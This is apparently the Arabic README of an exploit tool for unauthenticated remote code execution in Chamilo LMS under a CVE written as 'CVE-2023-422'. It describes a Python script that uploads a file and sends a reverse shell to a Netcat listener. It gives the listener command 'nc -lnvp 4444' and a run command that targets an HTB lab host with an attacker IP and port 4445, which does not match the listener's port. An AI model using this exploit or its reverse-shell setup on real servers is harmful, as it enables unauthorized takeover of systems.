
تنفيذ التعليمات البرمجية عن بُعد لـ Chamilo LMS
pip install requests
يستخدم سكربت بايثون الثغرة CVE-2023-422 لرفع ملف إلى الخادم، ويستخدم هذا الملف لإرسال شيل عكسي إلى مستمع Netcat، ويمكن فعل كل ذلك دون الحاجة إلى مصادقة. ومع ذلك، ستحتاج إلى اتباع الخطوات التالية لاستخدام سكربت بايثون بنجاح.
ابدأ مستمع Netcat:
nc -lnvp 4444
تشغيل سكربت بايثون (مثال):
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
يرجى ترك نجمة إذا كان الاستغلال التالي مفيدًا :)